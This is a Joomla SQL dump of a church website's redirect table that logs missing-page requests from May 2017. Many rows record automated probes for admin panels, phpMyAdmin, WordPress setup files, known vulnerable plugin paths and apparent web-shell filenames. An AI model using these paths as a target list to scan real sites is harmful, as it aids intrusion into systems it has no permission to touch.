(5111, 'https://www.lifeoasisinternationalchurch.org/about-us/broadcast-schedule', NULL, '', '', 177, 0, '2017-05-08 22:02:30', '0000-00-00 00:00:00', 301),
(5112, 'http://www.lifeoasisinternationalchurch.org/accordion-a/level-2', NULL, '', '', 3, 0, '2017-05-09 06:01:55', '0000-00-00 00:00:00', 301),
(5113, 'http://lifeoasisinternationalchurch.org/streaminu', NULL, '', '', 1, 0, '2017-05-09 10:12:41', '0000-00-00 00:00:00', 301),
(5114, 'http://www.lifeoasisinternationalchurch.org/accordion-a/level-22', NULL, '', '', 3, 0, '2017-05-09 10:14:56', '0000-00-00 00:00:00', 301),
(5115, 'http://lifeoasisinternationalchurch.org/administrator/administrator/index.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/', '', 1, 0, '2017-05-09 11:54:12', '0000-00-00 00:00:00', 301),
(5116, 'http://www.lifeoasisinternationalchurch.org/<!doctype', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-05-09 13:18:07', '0000-00-00 00:00:00', 301),
(5117, 'https://www.lifeoasisinternationalchurch.org/about-us/testimonies', NULL, '', '', 89, 0, '2017-05-09 14:47:26', '0000-00-00 00:00:00', 301),
(5118, 'http://lifeoasisinternationalchurch.org/loic/dailyreading.php', NULL, '', '', 11, 0, '2017-05-09 15:13:38', '0000-00-00 00:00:00', 301),
(5119, 'http://www.lifeoasisinternationalchurch.org/accordion-a/level-21', NULL, '', '', 3, 0, '2017-05-09 15:36:55', '0000-00-00 00:00:00', 301),
(5120, 'https://lifeoasisinternationalchurch.org/resources/blog/item/', NULL, '', '', 38, 0, '2017-05-09 19:42:14', '0000-00-00 00:00:00', 301),
(5121, 'https://lifeoasisinternationalchurch.org/resources/blog/item/administrator/', NULL, '', '', 1, 0, '2017-05-09 19:42:15', '0000-00-00 00:00:00', 301),
(5122, 'https://lifeoasisinternationalchurch.org/resources/blog/administrator/', NULL, '', '', 1, 0, '2017-05-09 19:42:16', '0000-00-00 00:00:00', 301),
(5123, 'https://lifeoasisinternationalchurch.org/resources/administrator/', NULL, '', '', 1, 0, '2017-05-09 19:42:16', '0000-00-00 00:00:00', 301),
(5124, 'http://www.lifeoasisinternationalchurch.org/sample-levels/level-22', NULL, '', '', 3, 0, '2017-05-09 21:22:36', '0000-00-00 00:00:00', 301),
(5125, 'http://www.lifeoasisinternationalchurch.org/sample-levels/level-21', NULL, '', '', 3, 0, '2017-05-10 00:12:43', '0000-00-00 00:00:00', 301),
(5126, 'https://lifeoasisinternationalchurch.org/about-us/broadcast-schedule', NULL, '', '', 61, 0, '2017-05-10 02:59:21', '0000-00-00 00:00:00', 301),
(5127, 'https://lifeoasisinternationalchurch.org/resources/bible-reading', NULL, '', '', 39, 0, '2017-05-10 02:59:21', '0000-00-00 00:00:00', 301),
(5128, 'http://www.lifeoasisinternationalchurch.org/archive/index.php', NULL, 'http://www.lifeoasisinternationalchurch.org/archive/index.php', '', 5, 0, '2017-05-10 10:04:52', '0000-00-00 00:00:00', 301),
(5129, 'http://www.lifeoasisinternationalchurch.org/index.php/images/demo/video/envato_sting.mp4', NULL, '', '', 1, 0, '2017-05-10 10:08:24', '0000-00-00 00:00:00', 301),
(5130, 'http://www.lifeoasisinternationalchurch.org/-download-faith', NULL, '', '', 1, 0, '2017-05-10 13:49:47', '0000-00-00 00:00:00', 301),
(5131, 'http://www.lifeoasisinternationalchurch.org/resources/lifestreaming', NULL, '', '', 1, 0, '2017-05-10 15:59:36', '0000-00-00 00:00:00', 301),
(5132, 'http://lifeoasisinternationalchurch.org/administrator/components/com_virtuemart/classes/shipping/config.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/components/com_virtuemart/classes/shipping/config.php', '', 3, 0, '2017-05-11 00:21:53', '0000-00-00 00:00:00', 301),
(5133, 'http://lifeoasisinternationalchurch.org/loic/thronemusic.php', NULL, '', '', 9, 0, '2017-05-11 01:39:09', '0000-00-00 00:00:00', 301),
(5134, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 2, 0, '2017-05-11 03:58:16', '0000-00-00 00:00:00', 301),
(5135, 'http://www.lifeoasisinternationalchurch.org/resources/sermon-notes/', NULL, 'http://krasnodar.nodup.ru/', '', 243, 0, '2017-05-11 13:16:43', '0000-00-00 00:00:00', 301),
(5136, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/60790', NULL, '', '', 1, 0, '2017-05-11 14:10:08', '0000-00-00 00:00:00', 301),
(5137, 'http://lifeoasisinternationalchurch.org/stremig', NULL, '', '', 3, 0, '2017-05-11 14:37:27', '0000-00-00 00:00:00', 301),
(5138, 'http://lifeoasisinternationalchurch.org/blog/feed', NULL, '', '', 2, 0, '2017-05-11 20:52:12', '0000-00-00 00:00:00', 301),
(5139, 'http://lifeoasisinternationalchurch.org/feeds/posts/default', NULL, '', '', 2, 0, '2017-05-11 20:52:12', '0000-00-00 00:00:00', 301),
(5140, 'http://lifeoasisinternationalchurch.org/rss?format=feed', NULL, '', '', 1, 0, '2017-05-11 20:52:14', '0000-00-00 00:00:00', 301),
(5141, 'http://lifeoasisinternationalchurch.org/rss', NULL, '', '', 3, 0, '2017-05-11 20:52:15', '0000-00-00 00:00:00', 301),
(5142, 'http://lifeoasisinternationalchurch.org/data/rss', NULL, '', '', 2, 0, '2017-05-11 20:52:15', '0000-00-00 00:00:00', 301),
(5143, 'http://lifeoasisinternationalchurch.org/data/atom', NULL, '', '', 2, 0, '2017-05-11 20:52:16', '0000-00-00 00:00:00', 301),
(5144, 'http://lifeoasisinternationalchurch.org/index.php/feed/', NULL, '', '', 2, 0, '2017-05-11 20:52:16', '0000-00-00 00:00:00', 301),
(5145, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/93659', NULL, '', '', 1, 0, '2017-05-11 23:17:38', '0000-00-00 00:00:00', 301),
(5146, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/28752', NULL, '', '', 1, 0, '2017-05-11 23:54:40', '0000-00-00 00:00:00', 301),
(5147, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1494607506990', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-05-12 16:45:07', '0000-00-00 00:00:00', 301),
(5148, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1494609172208', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-05-12 17:12:52', '0000-00-00 00:00:00', 301),
(5149, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1494619515433', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-05-12 20:05:14', '0000-00-00 00:00:00', 301),
(5150, 'http://www.lifeoasisinternationalchurch.org/loic/webofwisdom.php', NULL, '', '', 3, 0, '2017-05-13 03:51:44', '0000-00-00 00:00:00', 301),
(5151, 'http://www.lifeoasisinternationalchurch.org/amazon-store', NULL, '', '', 1, 0, '2017-05-13 11:53:05', '0000-00-00 00:00:00', 301),
(5152, 'http://www.lifeoasisinternationalchurch.org/private-stre', NULL, '', '', 1, 0, '2017-05-13 15:36:56', '0000-00-00 00:00:00', 301),
(5153, 'http://www.lifeoasisinternationalchurch.org/private-str', NULL, '', '', 1, 0, '2017-05-13 15:36:56', '0000-00-00 00:00:00', 301),
(5154, 'http://www.lifeoasisinternationalchurch.org/private-s', NULL, '', '', 2, 0, '2017-05-13 15:36:57', '0000-00-00 00:00:00', 301),
(5155, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/60430', NULL, '', '', 1, 0, '2017-05-13 18:35:42', '0000-00-00 00:00:00', 301),
(5156, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/28233', NULL, '', '', 1, 0, '2017-05-13 19:06:17', '0000-00-00 00:00:00', 301),
(5157, 'http://lifeoasisinternationalchurch.org/traning', NULL, '', '', 1, 0, '2017-05-13 22:07:36', '0000-00-00 00:00:00', 301),
(5158, 'http://lifeoasisinternationalchurch.org//index.php/component/users/?view=registration', NULL, 'http://lifeoasisinternationalchurch.org/', '', 2, 0, '2017-05-13 23:49:07', '0000-00-00 00:00:00', 301),
(5159, 'http://lifeoasisinternationalchurch.org/media/system/system.php', NULL, 'http://lifeoasisinternationalchurch.org/media/system/system.php', '', 1, 0, '2017-05-14 12:15:39', '0000-00-00 00:00:00', 301),
(5160, 'http://lifeoasisinternationalchurch.org/nwhtq.php', NULL, 'http://lifeoasisinternationalchurch.org/nwhtq.php', '', 1, 0, '2017-05-14 12:15:39', '0000-00-00 00:00:00', 301),
(5161, 'http://lifeoasisinternationalchurch.org/media/plg_system_stats/version.php', NULL, 'http://lifeoasisinternationalchurch.org/media/plg_system_stats/version.php', '', 1, 0, '2017-05-14 12:15:39', '0000-00-00 00:00:00', 301),
(5162, 'http://lifeoasisinternationalchurch.org/partnership/level to', NULL, '', '', 4, 0, '2017-05-15 04:03:55', '0000-00-00 00:00:00', 301),
(5163, 'http://lifeoasisinternationalchurch.org/partnership/levelto', NULL, '', '', 42, 0, '2017-05-15 05:23:14', '0000-00-00 00:00:00', 301),
(5164, 'http://www.lifeoasisinternationalchurch.org/prayer-request', NULL, '', '', 1, 0, '2017-05-15 06:13:44', '0000-00-00 00:00:00', 301),
(5165, 'http://lifeoasisinternationalchurch.org/partnership/l', NULL, '', '', 13, 0, '2017-05-15 07:33:04', '0000-00-00 00:00:00', 301),
(5166, 'http://lifeoasisinternationalchurch.org/partnership/levelt', NULL, '', '', 2, 0, '2017-05-15 07:33:04', '0000-00-00 00:00:00', 301),
(5167, 'http://lifeoasisinternationalchurch.org/partnership/le', NULL, '', '', 12, 0, '2017-05-15 07:33:04', '0000-00-00 00:00:00', 301),
(5168, 'http://lifeoasisinternationalchurch.org/partnership/leve', NULL, '', '', 11, 0, '2017-05-15 07:59:02', '0000-00-00 00:00:00', 301),
(5169, 'http://lifeoasisinternationalchurch.org/p', NULL, '', '', 12, 0, '2017-05-15 07:59:02', '0000-00-00 00:00:00', 301),
(5170, 'http://lifeoasisinternationalchurch.org/par', NULL, '', '', 12, 0, '2017-05-15 07:59:03', '0000-00-00 00:00:00', 301),
(5171, 'http://lifeoasisinternationalchurch.org/partn', NULL, '', '', 12, 0, '2017-05-15 07:59:03', '0000-00-00 00:00:00', 301),
(5172, 'http://lifeoasisinternationalchurch.org/partnership/lev', NULL, '', '', 11, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5173, 'http://lifeoasisinternationalchurch.org/partne', NULL, '', '', 12, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5174, 'http://lifeoasisinternationalchurch.org/partner', NULL, '', '', 5, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5175, 'http://lifeoasisinternationalchurch.org/partners', NULL, '', '', 12, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5176, 'http://lifeoasisinternationalchurch.org/pa', NULL, '', '', 11, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5177, 'http://lifeoasisinternationalchurch.org/partnersh', NULL, '', '', 11, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5178, 'http://lifeoasisinternationalchurch.org/partnershi', NULL, '', '', 12, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5179, 'http://lifeoasisinternationalchurch.org/part', NULL, '', '', 11, 0, '2017-05-15 07:59:04', '0000-00-00 00:00:00', 301),
(5180, 'http://lifeoasisinternationalchurch.org/old/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-05-15 15:42:00', '0000-00-00 00:00:00', 301),
(5181, 'http://lifeoasisinternationalchurch.org/test/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-05-15 15:42:01', '0000-00-00 00:00:00', 301),
(5182, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/user/199-revolusolaayodele/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:18', '0000-00-00 00:00:00', 301),
(5183, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/user/199-revolusolaayodeleareogun/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:19', '0000-00-00 00:00:00', 301),
(5184, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/user/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:19', '0000-00-00 00:00:00', 301),
(5185, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:20', '0000-00-00 00:00:00', 301),
(5186, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/user/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:20', '0000-00-00 00:00:00', 301),
(5187, 'http://www.lifeoasisinternationalchurch.org/component/k2/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:20', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(5188, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:21', '0000-00-00 00:00:00', 301),
(5189, 'http://www.lifeoasisinternationalchurch.org/component/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:21', '0000-00-00 00:00:00', 301),
(5190, 'https://www.lifeoasisinternationalchurch.org/component/k2/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:22', '0000-00-00 00:00:00', 301),
(5191, 'https://www.lifeoasisinternationalchurch.org/component/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-15 21:06:23', '0000-00-00 00:00:00', 301),
(5192, 'http://lifeoasisinternationalchurch.org/resources/streaming2', NULL, '', '', 3, 0, '2017-05-16 10:51:10', '0000-00-00 00:00:00', 301),
(5193, 'http://www.lifeoasisinternationalchurch.org/streming-private', NULL, '', '', 3, 0, '2017-05-16 14:51:13', '0000-00-00 00:00:00', 301),
(5194, 'http://www.lifeoasisinternationalchurch.org/private-streming', NULL, '', '', 2, 0, '2017-05-16 14:52:01', '0000-00-00 00:00:00', 301),
(5195, 'https://lifeoasisinternationalchurch.org/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 176, 0, '2017-05-17 05:20:34', '0000-00-00 00:00:00', 301),
(5196, 'http://www.lifeoasisinternationalchurch.org/22-joomla/11-music-is-food-for-the-soul', NULL, '', '', 3, 0, '2017-05-17 05:21:41', '0000-00-00 00:00:00', 301),
(5197, 'http://www.lifeoasisinternationalchurch.org/partnership.php', NULL, '', '', 1, 0, '2017-05-17 05:27:37', '0000-00-00 00:00:00', 301),
(5198, 'http://lifeoasisinternationalchurch.org/streamin/e', NULL, '', '', 3, 0, '2017-05-17 05:38:04', '0000-00-00 00:00:00', 301),
(5199, 'http://www.lifeoasisinternationalchurch.org/accordion-b/level-21', NULL, '', '', 2, 0, '2017-05-17 06:29:46', '0000-00-00 00:00:00', 301),
(5200, 'http://www.lifeoasisinternationalchurch.org/streaming/n/n17//05//2017/n/n', NULL, '', '', 1, 0, '2017-05-17 16:31:10', '0000-00-00 00:00:00', 301),
(5201, 'http://lifeoasisinternationalchurch.org/component/jcomments/captcha/88595', NULL, '', '', 2, 0, '2017-05-18 02:33:14', '0000-00-00 00:00:00', 301),
(5202, 'http://lifeoasisinternationalchurch.org/wp-feed.php', NULL, '', '', 1, 0, '2017-05-18 05:54:48', '0000-00-00 00:00:00', 301),
(5203, 'http://www.lifeoasisinternationalchurch.org/sample-levels/level-21/level-3', NULL, '', '', 2, 0, '2017-05-18 05:57:30', '0000-00-00 00:00:00', 301),
(5204, 'http://www.lifeoasisinternationalchurch.org/sample-levels/level-21/level-3-2', NULL, '', '', 2, 0, '2017-05-18 05:57:37', '0000-00-00 00:00:00', 301),
(5205, 'http://lifeoasisinternationalchurch.org/component/fields/', NULL, '', '', 6, 0, '2017-05-18 08:54:52', '0000-00-00 00:00:00', 301),
(5206, 'http://lifeoasisinternationalchurch.org/wp-installation.php?pass=wcwc2016', NULL, '', '', 1, 0, '2017-05-18 16:11:57', '0000-00-00 00:00:00', 301),
(5207, 'http://lifeoasisinternationalchurch.org/accordion-b/level-21', NULL, '', '', 1, 0, '2017-05-19 01:35:19', '0000-00-00 00:00:00', 301),
(5208, 'http://lifeoasisinternationalchurch.org/test_404_page/', NULL, '', '', 1, 0, '2017-05-19 04:56:24', '0000-00-00 00:00:00', 301),
(5209, 'http://lifeoasisinternationalchurch.org/web-console', NULL, '', '', 1, 0, '2017-05-19 04:56:25', '0000-00-00 00:00:00', 301),
(5210, 'http://lifeoasisinternationalchurch.org/admin-console', NULL, '', '', 1, 0, '2017-05-19 04:56:28', '0000-00-00 00:00:00', 301),
(5211, 'http://lifeoasisinternationalchurch.org/test_for_404/', NULL, '', '', 1, 0, '2017-05-19 04:56:29', '0000-00-00 00:00:00', 301),
(5212, 'http://lifeoasisinternationalchurch.org/manager/status', NULL, '', '', 1, 0, '2017-05-19 04:56:30', '0000-00-00 00:00:00', 301),
(5213, 'http://lifeoasisinternationalchurch.org/manager/html', NULL, '', '', 1, 0, '2017-05-19 04:56:31', '0000-00-00 00:00:00', 301),
(5214, 'http://lifeoasisinternationalchurch.org/phpmyadmin/', NULL, '', '', 1, 0, '2017-05-19 04:56:33', '0000-00-00 00:00:00', 301),
(5215, 'http://lifeoasisinternationalchurch.org/weblog/', NULL, '', '', 1, 0, '2017-05-19 04:56:34', '0000-00-00 00:00:00', 301),
(5216, 'http://lifeoasisinternationalchurch.org/bbs/', NULL, '', '', 1, 0, '2017-05-19 04:56:37', '0000-00-00 00:00:00', 301),
(5217, 'http://lifeoasisinternationalchurch.org/wcm/', NULL, '', '', 1, 0, '2017-05-19 04:56:38', '0000-00-00 00:00:00', 301),
(5218, 'http://lifeoasisinternationalchurch.org/admin/editor/', NULL, '', '', 1, 0, '2017-05-19 04:56:39', '0000-00-00 00:00:00', 301),
(5219, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/11-about-joomla', NULL, '', '', 3, 0, '2017-05-19 05:21:28', '0000-00-00 00:00:00', 301),
(5220, 'http://www.lifeoasisinternationalchurch.org/sample-levels/level-21/level-3/level-4', NULL, '', '', 2, 0, '2017-05-19 06:54:36', '0000-00-00 00:00:00', 301),
(5221, 'http://www.lifeoasisinternationalchurch.org/resources/private streaming', NULL, '', '', 1, 0, '2017-05-19 18:24:05', '0000-00-00 00:00:00', 301),
(5222, 'http://lifeoasisinternationalchurch.org/accordion-a/level-2', NULL, '', '', 1, 0, '2017-05-19 18:59:03', '0000-00-00 00:00:00', 301),
(5223, 'http://lifeoasisinternationalchurch.org/accordion-b/level-2', NULL, '', '', 1, 0, '2017-05-19 19:03:04', '0000-00-00 00:00:00', 301),
(5224, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 7, 0, '2017-05-19 22:32:41', '0000-00-00 00:00:00', 301),
(5225, 'http://www.lifeoasisinternationalchurch.org/gobc2009/index.html', NULL, '', '', 2, 0, '2017-05-20 02:13:46', '0000-00-00 00:00:00', 301),
(5226, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/74354', NULL, '', '', 1, 0, '2017-05-20 05:03:18', '0000-00-00 00:00:00', 301),
(5227, 'http://lifeoasisinternationalchurch.org/wp-register.php', NULL, '', '', 1, 0, '2017-05-20 20:01:23', '0000-00-00 00:00:00', 301),
(5228, 'http://www.lifeoasisinternationalchurch.org/streang', NULL, '', '', 2, 0, '2017-05-21 05:43:08', '0000-00-00 00:00:00', 301),
(5229, 'http://www.lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1495352057557', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/live-streaming', '', 1, 0, '2017-05-21 07:34:16', '0000-00-00 00:00:00', 301),
(5230, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1495361035735', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-05-21 10:03:54', '0000-00-00 00:00:00', 301),
(5231, 'http://lifeoasisinternationalchurch.org/trainig', NULL, '', '', 1, 0, '2017-05-21 12:20:33', '0000-00-00 00:00:00', 301),
(5232, 'http://lifeoasisinternationalchurch.org/wp-rdf.php', NULL, '', '', 1, 0, '2017-05-21 14:38:57', '0000-00-00 00:00:00', 301),
(5233, 'http://www.lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1495391345734', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/vod', '', 1, 0, '2017-05-21 18:29:04', '0000-00-00 00:00:00', 301),
(5234, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/55596', NULL, '', '', 1, 0, '2017-05-21 20:15:36', '0000-00-00 00:00:00', 301),
(5235, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/08/22/15', NULL, '', '', 2, 0, '2017-05-21 23:40:43', '0000-00-00 00:00:00', 301),
(5236, 'http://lifeoasisinternationalchurch.org//index.php?option=com_user&view=register', NULL, 'http://lifeoasisinternationalchurch.org/index.php/component/users/?view=registration', '', 2, 0, '2017-05-22 07:57:31', '0000-00-00 00:00:00', 301),
(5237, 'http://lifeoasisinternationalchurch.org//index.php/component/user/?task=register', NULL, 'http://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 1, 0, '2017-05-22 07:57:35', '0000-00-00 00:00:00', 301),
(5238, 'http://lifeoasisinternationalchurch.org//component/user/?task=register', NULL, 'http://lifeoasisinternationalchurch.org/component/users/?view=registration', '', 1, 0, '2017-05-22 07:57:40', '0000-00-00 00:00:00', 301),
(5239, 'http://lifeoasisinternationalchurch.org//option=com_user?view=register', NULL, 'http://lifeoasisinternationalchurch.org/component/user/?task=register', '', 1, 0, '2017-05-22 07:57:42', '0000-00-00 00:00:00', 301),
(5240, 'http://lifeoasisinternationalchurch.org/abundantlifehouse', NULL, '', '', 1, 0, '2017-05-22 10:35:48', '0000-00-00 00:00:00', 301),
(5241, 'http://lifeoasisinternationalchurch.org/index.php/programme/16-fp-tabs', NULL, '', '', 2, 0, '2017-05-22 11:43:55', '0000-00-00 00:00:00', 301),
(5242, 'http://www.lifeoasisinternationalchurch.org/templates/j2template/index.html', NULL, 'http://www.lifeoasisinternationalchurch.org/templates/j2template/index.html', '', 1, 0, '2017-05-22 16:53:45', '0000-00-00 00:00:00', 301),
(5243, 'http://lifeoasisinternationalchurch.org/templates/j2template/index.html', NULL, 'http://lifeoasisinternationalchurch.org/templates/j2template/index.html', '', 1, 0, '2017-05-22 17:11:36', '0000-00-00 00:00:00', 301),
(5244, 'http://lifeoasisinternationalchurch.org/wp-blog-config.php', NULL, '', '', 1, 0, '2017-05-22 18:29:51', '0000-00-00 00:00:00', 301),
(5245, 'http://lifeoasisinternationalchurch.org/fwsljf.php', NULL, 'http://lifeoasisinternationalchurch.org/fwsljf.php', '', 1, 0, '2017-05-23 03:56:10', '0000-00-00 00:00:00', 301),
(5246, 'http://lifeoasisinternationalchurch.org/logic.php', NULL, 'http://lifeoasisinternationalchurch.org/logic.php', '', 1, 0, '2017-05-23 03:56:10', '0000-00-00 00:00:00', 301),
(5247, 'http://lifeoasisinternationalchurch.org/pdo.inc.php', NULL, 'http://lifeoasisinternationalchurch.org/pdo.inc.php', '', 1, 0, '2017-05-23 03:56:10', '0000-00-00 00:00:00', 301),
(5248, 'http://lifeoasisinternationalchurch.org/opcaches.php', NULL, 'http://lifeoasisinternationalchurch.org/opcaches.php', '', 1, 0, '2017-05-23 03:56:10', '0000-00-00 00:00:00', 301),
(5249, 'http://lifeoasisinternationalchurch.org/dlwun.php', NULL, 'http://lifeoasisinternationalchurch.org/dlwun.php', '', 1, 0, '2017-05-23 03:56:11', '0000-00-00 00:00:00', 301),
(5250, 'http://lifeoasisinternationalchurch.org/php.php', NULL, 'http://lifeoasisinternationalchurch.org/php.php', '', 1, 0, '2017-05-23 03:56:11', '0000-00-00 00:00:00', 301),
(5251, 'http://lifeoasisinternationalchurch.org/plugins/editors/jckeditor/plugins/a11yhelp/config.php', NULL, 'http://lifeoasisinternationalchurch.org/plugins/editors/jckeditor/plugins/a11yhelp/config.php', '', 1, 0, '2017-05-23 03:56:51', '0000-00-00 00:00:00', 301),
(5252, 'http://lifeoasisinternationalchurch.org/plugins/editors/jckeditor/plugins/styles/config.php', NULL, 'http://lifeoasisinternationalchurch.org/plugins/editors/jckeditor/plugins/styles/config.php', '', 1, 0, '2017-05-23 03:56:51', '0000-00-00 00:00:00', 301),
(5253, 'http://lifeoasisinternationalchurch.org/yt.php', NULL, '', '', 3, 0, '2017-05-23 13:38:52', '0000-00-00 00:00:00', 301),
(5254, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/54-slide-04', NULL, '', '', 1, 0, '2017-05-23 13:44:32', '0000-00-00 00:00:00', 301),
(5255, 'http://lifeoasisinternationalchurch.org/gobc201', NULL, '', '', 2, 0, '2017-05-23 14:57:10', '0000-00-00 00:00:00', 301),
(5256, 'http://lifeoasisinternationalchurch.org/gobc20', NULL, '', '', 2, 0, '2017-05-23 14:57:10', '0000-00-00 00:00:00', 301),
(5257, 'http://lifeoasisinternationalchurch.org/gobc2', NULL, '', '', 1, 0, '2017-05-23 14:57:11', '0000-00-00 00:00:00', 301),
(5258, 'http://lifeoasisinternationalchurch.org/gob', NULL, '', '', 2, 0, '2017-05-23 14:57:11', '0000-00-00 00:00:00', 301),
(5259, 'http://lifeoasisinternationalchurch.org/go', NULL, '', '', 1, 0, '2017-05-23 14:57:11', '0000-00-00 00:00:00', 301),
(5260, 'http://lifeoasisinternationalchurch.org/g', NULL, '', '', 1, 0, '2017-05-23 14:57:11', '0000-00-00 00:00:00', 301),
(5261, 'http://www.lifeoasisinternationalchurch.org/sprivate', NULL, '', '', 1, 0, '2017-05-23 17:42:11', '0000-00-00 00:00:00', 301),
(5262, 'http://lifeoasisinternationalchurch.org/administrator/fs-login.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/fs-login.php', '', 1, 0, '2017-05-23 23:04:51', '0000-00-00 00:00:00', 301),
(5263, 'http://lifeoasisinternationalchurch.org/show.php?check=1', NULL, '', '', 1, 0, '2017-05-24 09:14:37', '0000-00-00 00:00:00', 301),
(5264, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/81600', NULL, '', '', 1, 0, '2017-05-24 12:13:56', '0000-00-00 00:00:00', 301),
(5265, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/31740', NULL, '', '', 1, 0, '2017-05-24 12:49:23', '0000-00-00 00:00:00', 301),
(5266, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/29341', NULL, '', '', 1, 0, '2017-05-24 13:42:18', '0000-00-00 00:00:00', 301),
(5267, 'http://www.lifeoasisinternationalchurch.org/component/content/article/2-uncategorised/58-private', NULL, '', '', 1, 0, '2017-05-24 13:44:20', '0000-00-00 00:00:00', 301),
(5268, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/54668', NULL, '', '', 1, 0, '2017-05-24 14:09:40', '0000-00-00 00:00:00', 301),
(5269, 'http://lifeoasisinternationalchurch.org/12-sample-content/16-sample-content-5', NULL, '', '', 1, 0, '2017-05-24 15:25:18', '0000-00-00 00:00:00', 301),
(5270, 'http://lifeoasisinternationalchurch.org/administrator/a1.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/a1.php', '', 1, 0, '2017-05-24 19:19:23', '0000-00-00 00:00:00', 301),
(5271, 'http://lifeoasisinternationalchurch.org/sample-levels/level-2', NULL, '', '', 1, 0, '2017-05-25 03:37:50', '0000-00-00 00:00:00', 301),
(5272, 'http://lifeoasisinternationalchurch.org/accordion-a/level-22', NULL, '', '', 1, 0, '2017-05-25 03:59:52', '0000-00-00 00:00:00', 301),
(5273, 'http://lifeoasisinternationalchurch.org/writebab.php', NULL, '', '', 1, 0, '2017-05-25 14:09:16', '0000-00-00 00:00:00', 301),
(5274, 'http://www.lifeoasisinternationalchurch.org/loic-forum/8-newsflash', NULL, '', '', 2, 0, '2017-05-26 01:42:14', '0000-00-00 00:00:00', 301),
(5275, 'http://lifeoasisinternationalchurch.org/view.php?check=1', NULL, '', '', 1, 0, '2017-05-26 09:49:20', '0000-00-00 00:00:00', 301),
(5276, 'http://www.lifeoasisinternationalchurch.org/notify-notifiy_yellow_coaching?ahr0cdovl3d3dy5sawzlb2fzaxnpbnrlcm5hdglvbmfsy2h1cmnolm9yzy8=;lyuyicflwkhvfj9v2gn3zyiedcemb2l139mba+gdh44=', NULL, '', '', 31, 0, '2017-05-26 14:30:23', '0000-00-00 00:00:00', 301),
(5277, 'http://lifeoasisinternationalchurch.org/trackback.php', NULL, '', '', 1, 0, '2017-05-26 19:57:06', '0000-00-00 00:00:00', 301),
(5278, 'http://www.lifeoasisinternationalchurch.org/streaming/pastoral training', NULL, '', '', 2, 0, '2017-05-26 21:30:20', '0000-00-00 00:00:00', 301),
